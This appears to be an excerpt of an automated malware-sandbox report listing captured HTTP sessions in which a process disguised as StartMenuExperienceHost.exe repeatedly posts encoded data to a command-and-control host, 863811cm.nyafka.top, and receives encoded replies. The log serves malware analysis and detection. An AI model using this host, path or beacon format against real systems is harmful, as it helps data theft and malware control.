                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 1972
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:36:37.525701046 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:36:37.525981903 CEST1972OUTData Raw: 50 53 58 59 51 5c 5d 55 5e 5a 55 58 51 55 5a 5e 57 5c 58 5b 55 50 51 5e 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: PSXYQ\]U^ZUXQUZ^W\X[UPQ^XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z:<>+?)$&.+&7683+0=!4+V$:=8(G"1,_);#Y$/\*1
                                                                Oct 11, 2024 01:36:37.837199926 CEST741INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:36:37 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9wrHaUAYPRUkLaHirVUWNX4jiF0FbMXA%2BsF5lCwKj95S%2FQUVARvSt1%2FEiw3MBHJbPc7j09RV58Zy01oK5Jh8FUYLtbdEYLWxkakxr44trnUyTR0SNEAMIs0hYvNR6WiU3ObuXu%2FW"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6f023a034374-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 24 00 2a 2a 2d 0f 34 3e 28 02 3b 1f 2b 02 29 03 2d 01 28 31 33 5e 32 0a 20 07 39 05 35 1e 23 3b 27 01 3d 2f 2e 59 27 02 2f 5c 2b 31 2a 51 03 1b 39 12 3c 0d 30 0d 28 22 0b 17 2b 32 2e 07 27 23 17 42 2a 03 0f 1f 25 3d 3a 16 22 32 28 56 3d 2c 23 55 3b 15 24 1a 28 28 39 01 23 2b 2a 5f 08 13 39 54 3e 5e 20 56 36 0e 29 5c 21 13 3c 0e 36 17 3a 52 3d 17 03 0d 33 33 38 17 38 32 3c 5f 34 2f 2b 57 22 2f 21 0a 20 2d 24 5b 26 38 22 5f 22 00 29 51 00 3f 54 52 0d 0a
                                                                Data Ascii: 98$**-4>(;+)-(13^2 95#;'=/.Y'/\+1*Q9<0("+2.'#B*%=:"2(V=,#U;$((9#+*_9T>^ V6)\!<6:R=33882<_4/+W"/! -$[&8"_")Q?TR
                                                                Oct 11, 2024 01:36:37.969474077 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                8192.168.2.549811188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:36:35.354640007 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2584
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:36:35.707324028 CEST2584OUTData Raw: 50 5b 58 5e 54 58 58 51 5e 5a 55 58 51 52 5a 5e 57 5c 58 55 55 55 51 5f 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: P[X^TXXQ^ZUXQRZ^W\XUUUQ_XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9?$?0&./<%\5/< )4(')761X>#Y$/\*
                                                                Oct 11, 2024 01:36:35.835129976 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:36:36.066507101 CEST598INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:36:36 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Cm7I7P%2B8UqqTwL%2Bcv%2F7VdGoTjjPeaNHP6dHZEpuw4XPfsn78j5Be0%2FF8EBdPcyCJmvZji2UPN0aW4lRRAP2Ggz8lLJDsWK3%2Bpf3joRq7%2FvuwIX4If0oSivjvr8um8H%2FTPK6zslHP"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6ef79a617290-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a
                                                                Data Ascii: 44Z^Q
                                                                Oct 11, 2024 01:36:36.158477068 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                9192.168.2.549818188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:36:36.292578936 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2584
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:36:36.644917965 CEST2584OUTData Raw: 50 5b 58 59 54 59 58 52 5e 5a 55 58 51 52 5a 59 57 5d 58 5e 55 52 51 5f 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: P[XYTYXR^ZUXQRZYW]X^URQ_XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9+=?:#1$E*67!;#+# $$.-S*@ !(+#Y$/\*
                                                                Oct 11, 2024 01:36:36.747127056 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:36:36.985327005 CEST595INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:36:36 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=27nWUTetQZwAIfUDUvu8YrJmOta5Ij0h86AdK2a%2F%2Bgu4kLESwkV0edor72Y1NwrpoZ4K2koRfVeTgb%2BGZnERN1mAF8piiWe4sttlXRyKyVGlxNUK2N1LHnx50qf9odZ3CnjLL0qc"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6efd5b106a56-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 44Z^Q0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                10192.168.2.549825188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:36:37.118617058 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2584
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:36:37.473211050 CEST2584OUTData Raw: 55 5e 5d 5a 51 5b 58 51 5e 5a 55 58 51 53 5a 52 57 5e 58 5c 55 50 51 59 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: U^]ZQ[XQ^ZUXQSZRW^X\UPQYXED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9\?<<*/%'(5460+3%V740=W=8F62/)#Y$/\*9
                                                                Oct 11, 2024 01:36:37.581888914 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:36:37.833770990 CEST597INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:36:37 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BGzZV0LjT%2FUAVr4ovUoOqJudFqXmdupiOZ0C731fnpTD9lWK5RetHR3CjMRZJI0WGMBR96I%2F536ROC7AsMbegVpedJnrukxzzHPYhB1WzZ0%2BXSpXQBajQAGU4muY76tTPQfC75di"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6f029e2f421f-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 44Z^Q0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                11192.168.2.549831188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:36:38.043611050 CEST335OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2584
                                                                Expect: 100-continue
                                                                Connection: Keep-Alive
                                                                Oct 11, 2024 01:36:38.394784927 CEST2584OUTData Raw: 50 5c 5d 54 51 5c 58 53 5e 5a 55 58 51 50 5a 58 57 58 58 5f 55 56 51 5e 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: P\]TQ\XS^ZUXQPZXWXX_UVQ^XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z:+[,<\;R2-3?5"; (U!T4/W3>")^8A"1$)#Y$/\*5
                                                                Oct 11, 2024 01:36:38.669958115 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:36:38.702796936 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:36:38.738609076 CEST601INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:36:38 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=baO%2BJf66YXHTzkkrWgyoTtj0ialhW33l%2B8KqwzPS3%2Bo6DgmNeUOZzMy%2FS4I6GtWWHR%2F9HyFBOu7APQ6EWUXg9KueHfOth%2BiedS0ZATZcPqVJs8bf2ky1dNANERghpFF5gbK3ENmo"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6f084ad880d6-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 44Z^Q0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                12192.168.2.549832188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:36:38.094677925 CEST335OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 1972
                                                                Expect: 100-continue
                                                                Connection: Keep-Alive
                                                                Oct 11, 2024 01:36:38.442022085 CEST1972OUTData Raw: 50 52 5d 5a 54 5e 58 54 5e 5a 55 58 51 55 5a 5b 57 5b 58 58 55 51 51 5b 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: PR]ZT^XT^ZUXQUZ[W[XXUQQ[XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9(-4>:/U2$+%X5; (S4&-9((?!1)#Y$/\*%
                                                                Oct 11, 2024 01:36:38.472830057 CEST1236OUTData Raw: 0e 08 50 1a 31 2f 06 25 05 59 01 1e 07 35 05 01 06 3a 2a 27 31 0b 03 3c 0b 37 06 3e 39 02 30 07 31 59 16 1f 3e 00 5e 34 08 01 0a 2c 38 56 01 24 32 2f 3d 5a 35 54 2c 20 25 1b 1e 1f 2d 2f 00 2b 3d 5f 15 27 30 3e 0f 25 33 59 28 1b 33 0e 25 2d 34 37
                                                                Data Ascii: P1/%Y5:*'1<7>901Y>^4,8V$2/=Z5T, %-/+=_'0>%3Y(3%-47E(1312'21!;"&E06+/W3=18?" !:/A28$Q"4&9>+=(6$""T$>??$.(<%&Y?T,8)8=7 ]68;5<+YT?X3;_?=[=:)1&+[=> E(&/98%4"9
                                                                Oct 11, 2024 01:36:38.669985056 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:36:39.033168077 CEST740INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:36:38 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fiWmNLdEdx310s6j6nMpACYU9cwI68yaQexqFNv%2BYzIHUQfjcYLRv23fHeTk3cUxEqylf8R7oWy7i5LCUzdzYhoKZMVQCHlRB5znBqdXRAYwgbklL7RvQPXbuRiOO9q2By4Ml0nI"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6f089ba28c1b-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 27 59 28 29 0c 1f 34 3d 3f 1f 2f 08 23 03 3d 04 3d 07 29 21 05 58 25 42 37 58 2d 02 39 57 21 2b 30 1a 3e 3f 35 07 33 2c 34 04 28 31 2a 51 03 1b 39 13 28 33 33 13 28 32 03 5e 28 0c 0f 5d 24 20 3d 45 29 2d 2d 1d 24 3d 25 04 23 21 2c 53 2a 5a 27 55 2d 38 20 1a 3e 01 3e 59 20 3b 2a 5f 08 13 3a 0f 3e 38 06 57 35 37 04 04 35 03 1a 0c 35 39 04 53 3f 29 22 13 27 55 2c 1a 2f 32 28 5a 20 59 2b 1e 22 12 0f 0f 21 2e 23 05 25 02 22 5f 22 00 29 51 00 3f 54 52 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 98'Y()4=?/#==)!X%B7X-9W!+0>?53,4(1*Q9(33(2^(]$ =E)--$=%#!,S*Z'U-8 >>Y ;*_:>8W57559S?)"'U,/2(Z Y+"!.#%"_")Q?TR0
                                                                Oct 11, 2024 01:36:39.145467043 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2004
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:36:39.239865065 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:36:39.240168095 CEST2004OUTData Raw: 50 52 5d 5e 51 59 58 55 5e 5a 55 58 51 51 5a 5a 57 5f 58 58 55 51 51 5c 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: PR]^QYXU^ZUXQQZZW_XXUQQ\XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9X<.#+*S%;++"<0=7+$-1S>B"W/>#Y$/\*1
                                                                Oct 11, 2024 01:36:39.540537119 CEST748INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:36:39 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GSDwZaOEkz6x5LvVXLnOOOxEg0epm1BdZnVxYejHjmwj%2FFB%2FYNsiMaVyIxX7RQNAXf68oLU%2FvhnkFCayMY%2BT1NvcbdrouN89blCAUKjmDaPjgFoVq8MLIqi8cxLNuY0B%2FDfweFcf"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6f0cf9658c1b-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 27 5c 28 29 25 0f 37 07 2b 11 2c 22 27 06 29 13 03 06 3c 31 0e 01 25 34 1e 07 2c 2c 0b 56 22 05 2c 5f 3d 3c 0c 12 27 3f 2f 1f 2b 21 2a 51 03 1b 39 59 3f 0d 0a 09 3c 32 36 06 29 22 25 5e 30 0d 39 09 29 2e 22 09 27 3e 29 01 36 21 09 0e 2a 12 01 55 2f 5d 2b 09 3e 38 32 5b 21 3b 2a 5f 08 13 3a 0f 3e 06 34 1c 21 37 0b 17 22 03 3b 10 35 39 26 1a 29 07 2a 13 27 20 2f 06 2f 22 2c 58 20 2c 2b 51 22 05 3e 1d 23 03 02 11 26 12 22 5f 22 00 29 51 00 3f 54 52 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 98'\()%7+,"')<1%4,,V",_=<'?/+!*Q9Y?<26)"%^09)."'>)6!*U/]+>82[!;*_:>4!7";59&)*' //",X ,+Q">#&"_")Q?TR0
                                                                Oct 11, 2024 01:36:39.645142078 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2004
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:36:39.746145010 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:36:39.746279955 CEST2004OUTData Raw: 50 5d 5d 5a 54 5c 5d 54 5e 5a 55 58 51 5c 5a 53 57 58 58 58 55 57 51 52 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: P]]ZT\]T^ZUXQ\ZSWXXXUWQRXED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9<=X(R&X?('"8<= 83>1V*^ G6 );#Y$/\*
                                                                Oct 11, 2024 01:36:40.045020103 CEST748INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:36:39 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iGRNxb%2Bpo5w0dZIHJyQO9oHpZ1uLYnkB9SGD9YBNnaBY8TudiCfSLpN0SR7X5v7PQCBHvXswkA6dTLPphlWU%2Fn0mM5BX1ETsz%2BacLbFSIWNPz5522EAok1dor6Va9wWzQ%2F2BS%2FS5"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6f101cff8c1b-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 27 1b 28 29 29 0e 37 2d 33 5a 38 0f 30 5a 29 2e 25 01 3c 31 37 59 25 24 30 04 2d 5a 21 57 36 38 2f 00 29 2c 0f 06 30 3f 2b 1f 3c 0b 2a 51 03 1b 39 5b 28 55 38 0c 29 21 2d 5d 3f 31 21 5e 26 20 25 42 29 03 2d 56 30 3e 39 04 36 0f 06 52 3e 5a 23 10 3b 38 23 45 29 3b 26 5b 23 2b 2a 5f 08 13 39 1e 3e 16 2b 09 36 51 26 04 35 13 33 55 22 07 31 08 3e 39 03 0c 33 30 30 58 2c 32 3f 07 23 3c 3c 08 36 2c 3d 0e 34 3d 30 10 31 38 22 5f 22 00 29 51 00 3f 54 52 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 98'())7-3Z80Z).%<17Y%$0-Z!W68/),0?+<*Q9[(U8)!-]?1!^& %B)-V0>96R>Z#;8#E);&[#+*_9>+6Q&53U"1>9300X,2?#<<6,=4=018"_")Q?TR0
                                                                Oct 11, 2024 01:36:40.160705090 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2004
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:36:40.255075932 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:36:40.255245924 CEST2004OUTData Raw: 50 5e 58 5a 54 58 5d 51 5e 5a 55 58 51 53 5a 5f 57 50 58 54 55 5c 51 5c 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: P^XZTX]Q^ZUXQSZ_WPXTU\Q\XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9?7?+W2.(<7!Y+U%4Q3-)>8 C"2/)#Y$/\*9
                                                                Oct 11, 2024 01:36:40.558254004 CEST748INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:36:40 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wdcV%2Bhou4PzOvYaejEcwSzU%2FCMEcFm0WVdIaDBDqToF5GYb1Z9DiCJolRptSIqjSsZBR%2F5AV2uIBg9tKGeUdjHC6%2Fgz3Lb0HI3NjJPnVgsElXHOMGWaIoYMLl%2FA2rNaPyZRcoo8f"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6f13496e8c1b-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 27 14 29 07 39 0c 37 3e 2f 58 2d 21 3c 1d 29 03 0c 15 28 1f 33 13 32 24 3c 04 3a 12 0f 1c 21 5d 33 01 2a 2c 2a 12 30 12 27 12 3c 21 2a 51 03 1b 39 5a 3f 1d 2b 55 2b 0c 29 5f 28 0c 26 05 24 20 3d 41 29 2d 03 1f 27 3e 08 16 35 1f 37 0a 3e 12 23 54 3b 05 28 1d 3d 3b 26 10 23 2b 2a 5f 08 13 3a 0f 3e 3b 27 0c 35 09 0b 17 22 3d 34 0e 21 07 32 56 3e 07 0c 51 24 23 0a 5e 2c 0c 3c 5b 20 2c 28 0e 35 12 26 53 34 03 09 01 25 02 22 5f 22 00 29 51 00 3f 54 52 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 98')97>/X-!<)(32$<:!]3*,*0'<!*Q9Z?+U+)_(&$ =A)-'>57>#T;(=;&#+*_:>;'5"=4!2V>Q$#^,<[ ,(5&S4%"_")Q?TR0
                                                                Oct 11, 2024 01:36:40.690958977 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 1992
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:36:40.785904884 CEST25INHTTP/1.1 100 Continue
